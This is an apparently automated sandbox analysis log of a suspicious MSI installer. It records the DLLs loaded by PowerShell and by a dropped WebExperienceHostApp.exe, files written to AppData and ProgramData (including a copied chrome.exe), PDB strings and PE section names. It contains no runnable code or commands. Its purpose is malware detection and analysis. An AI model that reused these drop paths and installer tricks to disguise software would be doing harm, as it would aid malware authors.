Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: msvcp140_app.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: vcruntime140_1_app.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: vcruntime140_app.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: vcruntime140_app.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: vcruntime140_1_app.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Section loaded: version.dll	Jump to behavior
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Section loaded: magnification.dll	Jump to behavior
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Section loaded: wtsapi32.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1A66AEDC-93C3-4ACC-BA96-08F5716429F7}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: ust_019821730-0576383.msi

Static file information: File size 5776896 > 1048576

Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\app\\vcomp140_app.amd64.pdb source: vcomp140_app.dll.1.dr
Source:	Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\initialexe\chrome.exe.pdb source: WebExperienceHostApp.exe, 00000005.00000003.1818415214.00007DF4929C0000.00000004.00001000.00020000.00000000.sdmp, chrome.exe, 00000007.00000000.1855768312.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe, 00000007.00000002.2878824151.00007FF64586F000.00000002.00000001.01000000.0000000A.sdmp, chrome.exe.5.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdb source: ust_019821730-0576383.msi, 67df31.rbs.1.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\PowerShellScriptLauncher.pdbg source: ust_019821730-0576383.msi, 67df31.rbs.1.dr
Source:	Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\chrome_pwa_launcher.exe.pdb source: WebExperienceHostApp.exe, 00000005.00000003.1825688488.00007DF4929C0000.00000004.00001000.00020000.00000000.sdmp, chrome_pwa_launcher.exe.5.dr
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\app\\msvcp140_app.amd64.pdb source: WebExperienceHostApp.exe, 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: WebExperienceHostApp.pdb&& source: WebExperienceHostApp.exe, 00000005.00000002.1866720971.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmp, WebExperienceHostApp.exe, 00000005.00000000.1805619880.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmp, WebExperienceHostApp.exe.1.dr
Source:	Binary string: WebExperienceHostApp.pdb source: WebExperienceHostApp.exe, 00000005.00000002.1866720971.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmp, WebExperienceHostApp.exe, 00000005.00000000.1805619880.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmp, WebExperienceHostApp.exe.1.dr
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\app\\vcruntime140_app.amd64.pdb source: WebExperienceHostApp.exe, 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: mrt100_app.pdb source: mrt100_app.dll.1.dr
Source:	Binary string: d:\a01\_work\3\s\\binaries\amd64ret\bin\amd64\\app\\vcomp140_app.amd64.pdbGCTL source: vcomp140_app.dll.1.dr
Source:	Binary string: C:\b\s\w\ir\cache\builder\src\out\Release_x64\vulkan-1.dll.pdb source: WebExperienceHostApp.exe, 00000005.00000003.1843609881.00007DF4929E0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: B.pdb source: external_extensions_0000x.57.5.dr
Source:	Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: ust_019821730-0576383.msi, MSIE184.tmp.1.dr, MSIE1F2.tmp.1.dr

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe

Code function: 5_2_00007FF625A12AA0 LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,LoadLibraryW,GetProcAddress,FreeLibrary,

5_2_00007FF625A12AA0

Source: initial sample

Static PE information: section where entry point is pointing to: .iQD

Source: mrt100_app.dll.1.dr	Static PE information: section name: .didat
Source: vcruntime140_1_app.dll.1.dr	Static PE information: section name: .didata
Source: vcruntime140_app.dll.1.dr	Static PE information: section name: _RDATA
Source: xmpp.dll.1.dr	Static PE information: section name: .didata
Source: chrome.exe.5.dr	Static PE information: section name: .gxfg
Source: chrome.exe.5.dr	Static PE information: section name: .retplne
Source: chrome.exe.5.dr	Static PE information: section name: CPADinfo
Source: chrome.exe.5.dr	Static PE information: section name: _RDATA
Source: chrome.exe.5.dr	Static PE information: section name: malloc_h
Source: chrome_elf.dll.5.dr	Static PE information: section name: .didata
Source: chrome_elf.dll.5.dr	Static PE information: section name: .?rL
Source: chrome_elf.dll.5.dr	Static PE information: section name: .'p"
Source: chrome_elf.dll.5.dr	Static PE information: section name: .4kb
Source: chrome_elf.dll.5.dr	Static PE information: section name: .iQD
Source: chrome_pwa_launcher.exe.5.dr	Static PE information: section name: .00cfg
Source: chrome_pwa_launcher.exe.5.dr	Static PE information: section name: .gxfg
Source: chrome_pwa_launcher.exe.5.dr	Static PE information: section name: .retplne
Source: chrome_pwa_launcher.exe.5.dr	Static PE information: section name: LZMADEC
Source: chrome_pwa_launcher.exe.5.dr	Static PE information: section name: _RDATA
Source: chrome_pwa_launcher.exe.5.dr	Static PE information: section name: malloc_h
Source: vulkan-1.dll.5.dr	Static PE information: section name: .gxfg
Source: vulkan-1.dll.5.dr	Static PE information: section name: .retplne
Source: vulkan-1.dll.5.dr	Static PE information: section name: _RDATA

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA7D180 pushfq ; retf 0000h		5_2_00007FFDFBA7D181
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Code function: 5_2_00007FFDFBA7F6C4 pushfq ; ret		5_2_00007FFDFBA7F6C5

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE184.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\appData\vcruntime140_1_app.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\appData\xmpp.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE0C6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\appData\mrt100_app.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\appData\msvcp140_app.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\appData\vcomp140_app.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\vulkan-1.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\appData\vcruntime140_app.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\appData\vcamp140_app.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE164.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE62B.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Local\appData\vccorlib140_app.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_elf.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE1F2.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE134.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_pwa_launcher.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\vulkan-1.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\appData\WebExperienceHostApp.exe	File created: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome_elf.dll	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE184.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE0C6.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE164.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE62B.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE1F2.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSIE134.tmp	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
